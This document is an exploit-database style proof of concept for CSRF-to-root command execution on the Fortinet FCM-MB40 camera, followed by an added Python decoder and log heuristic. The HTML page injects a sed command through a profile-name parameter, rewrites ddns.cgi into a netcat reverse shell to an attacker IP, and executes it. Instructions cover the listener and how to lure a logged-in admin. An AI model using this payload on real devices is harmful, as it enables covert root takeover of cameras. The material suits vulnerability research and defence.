# Exploit Title: FCM-MB40 Remote Command Execution as Root via CSRF
# Date: 2019-06-19
# Exploit Author: @XORcat
# Vendor Homepage: https://fortinet.com/
# Software Link: Customer Account Required
# Version: v1.2.0.0
# Tested on: Linux
# CVE : TBA

<html>
<!--
FCM-MB40 CSRF to RCE as root, by Aaron Blair (@xorcat)
Full details: https://xor.cat/2019/06/19/fortinet-forticam-vulns/

Follow these steps to demonstrate this PoC:

1. Replace the IP addresses in the JavaScript code to represent your testing environment.
2. Launch a <code>netcat</code> listener on the attacker's host using <code>nc -nvlp 1337</code>.
3. Ensure the "admin" user's browser is logged in to the FCM-MB40.
   * Note: all modern browsers will cache Basic Authentication credentials (such as those used by the FCM-MB40) even if the FCM-MB40's administration page is closed.
4. Open the crafted HTML document using the "admin" user's browser.
   * Note: In an attack scenario, this step would be performed by implanting the code into a legitimate webpage that the "admin" user visits, or by tricking the "admin" user into opening a page which includes the code.
5. Note that the <code>netcat</code> listener established in step 2 has received a connection from the camera, and that it is presenting a <code>/bin/sh</code> session as root.
   * Note: type <code>id</code> in the <code>netcat</code> connection to verify this.

_Note: After this issue has been exploited, the state of the system will have changed, and future exploitation attempts may require modification._
-->
<head>
<script>
// Promise-based delay so the second request is sent only after the first
// has had time to rewrite ddns.cgi on the camera.
const sleep = (milliseconds) => {
    return new Promise(resolve => setTimeout(resolve, milliseconds))
};

// Request 1: the "name" parameter carries a sed expression (-e ...) and the
// path ../cgi-bin/ddns.cgi. %20 decodes to spaces, so the camera treats
// these as separate arguments; inside the sed script \t (tab) and \n are used
// instead of spaces and line breaks so the expression stays one argument.
// The substitution replaces the first line of ddns.cgi starting with "if"
// by a netcat reverse shell back to the attacker host, followed by "exit".
// Change 192.168.1.20 (camera) and 192.168.1.10 (attacker) for your lab.
var sed_url = 'http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/%20../cgi-bin/ddns.cgi%20&save=profile';

// Request 2: fetching the rewritten CGI runs it as root on the camera.
var execute_url = 'http://192.168.1.20/cgi-bin/ddns.cgi';

// Cross-origin GETs via <img> are enough for CSRF here: the browser attaches
// the cached Basic Authentication credentials; the image need not be
// appended to the DOM for the request to be sent.
var sed_img = document.createElement("img");
sed_img.src = sed_url;

sleep(400).then(() => {
    var execute_img = document.createElement("img");
    execute_img.src = execute_url;
});
</script>
</head>
<body>
<h1>Welcome to my non-malicious website.</h1>
</body>
</html>
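The following Python is an added example, not part of @XORcat's PoC or of Fortinet's firmware. It decodes the `sed_url` from the PoC above, splits the `name` parameter the way an unquoted shell interpolation would (the `-e` flag and the `../cgi-bin/ddns.cgi` operand in the payload strongly suggest the name is passed straight to a sed command line, but the camera's CGI source is not on this page, so that is an inference), expands the GNU sed escapes the payload depends on, and applies the substitution to a constructed stand-in for `ddns.cgi`. It also includes a small request-log check for profile names that carry flags, traversal or an s/// script. The `DDNS_CGI_STANDIN` content and the check's heuristics are assumptions made for illustration.

```python
# Added example (not from the PoC): decode the crafted camctrl_save_profile.cgi
# request and show what its `name` parameter does to the target script.
# The URL is the PoC's; the ddns.cgi stand-in is constructed for illustration.
import re
from urllib.parse import parse_qs, urlsplit

# sed_url from the PoC ("\\t" is a literal backslash-t, as in the JavaScript).
SED_URL = ("http://192.168.1.20/cgi-bin/camctrl_save_profile.cgi?num=9"
           "&name=a%20-e%20s/^if.*/nc\\t192.168.1.10\\t1337\\t-e\\t\\/bin\\/sh\\nexit/"
           "%20../cgi-bin/ddns.cgi%20&save=profile")

# Constructed stand-in for /cgi-bin/ddns.cgi: a shell CGI with one `if` line.
DDNS_CGI_STANDIN = """#!/bin/sh
echo "Content-type: text/plain"
echo
if [ -f /etc/ddns.conf ]; then
    . /etc/ddns.conf
fi
echo done
"""


def payload_tokens(url):
    """URL-decode the `name` parameter and split it on whitespace, as an
    unquoted shell interpolation would. %20 becomes a space, which is why
    the payload uses \\t (tab) rather than spaces inside the sed script."""
    name = parse_qs(urlsplit(url).query)["name"][0]
    return name.split()


def parse_sed_subst(expr):
    """Split `s<d>regex<d>repl<d>flags` on unescaped delimiters."""
    if len(expr) < 2 or expr[0] != "s":
        raise ValueError("not an s/// expression: %r" % expr)
    delim, parts, cur, i = expr[1], [], [], 2
    while i < len(expr):
        ch = expr[i]
        if ch == "\\" and i + 1 < len(expr):      # keep escapes intact for now
            cur.append(ch + expr[i + 1])
            i += 2
            continue
        if ch == delim:
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
        i += 1
    parts.append("".join(cur))                    # trailing flags, may be empty
    if len(parts) != 3:
        raise ValueError("malformed s/// expression: %r" % expr)
    return parts                                  # [regex, replacement, flags]


def sed_replacement(repl):
    """Expand the GNU sed replacement escapes this payload relies on:
    \\t -> tab, \\n -> newline, \\/ -> '/'. (& and \\1 backrefs not handled.)"""
    table = {"t": "\t", "n": "\n"}
    out, i = [], 0
    while i < len(repl):
        if repl[i] == "\\" and i + 1 < len(repl):
            out.append(table.get(repl[i + 1], repl[i + 1]))
            i += 2
        else:
            out.append(repl[i])
            i += 1
    return "".join(out)


def apply_sed_subst(expr, text):
    """Apply the substitution line by line, as `sed -e expr` does. The
    payload's regex (^if.*) means the same thing in POSIX BRE and Python re."""
    regex, repl, flags = parse_sed_subst(expr)
    pattern = re.compile(regex)
    literal = sed_replacement(repl)
    count = 0 if "g" in flags else 1
    return "\n".join(pattern.sub(lambda m: literal, line, count=count)
                     for line in text.split("\n"))


def rewritten_ddns_cgi(url=SED_URL, script=DDNS_CGI_STANDIN):
    """What the stand-in ddns.cgi looks like after the injected -e runs over it."""
    tokens = payload_tokens(url)
    sed_expr = tokens[tokens.index("-e") + 1]
    return apply_sed_subst(sed_expr, script)


def suspicious_profile_name(url):
    """Request-log check (heuristic): a profile name should never carry option
    flags, path traversal or an s/// script. Returns the reasons it looks injected."""
    name = parse_qs(urlsplit(url).query).get("name", [""])[0]
    reasons = []
    if re.search(r"(^|\s)-[A-Za-z]", name):
        reasons.append("option flag in name")
    if "../" in name:
        reasons.append("path traversal in name")
    if re.search(r"(^|\s)s[/|#].+[/|#]", name):
        reasons.append("sed substitution in name")
    return reasons
```

Running `rewritten_ddns_cgi()` shows the `if` line of the stand-in replaced by a tab-separated `nc 192.168.1.10 1337 -e /bin/sh` followed by `exit`; the `exit` is what keeps the shell from reaching the now-unmatched `fi` further down, and also why the PoC warns that a second attempt may need changes, since the `if` line it matches on is gone after the first run.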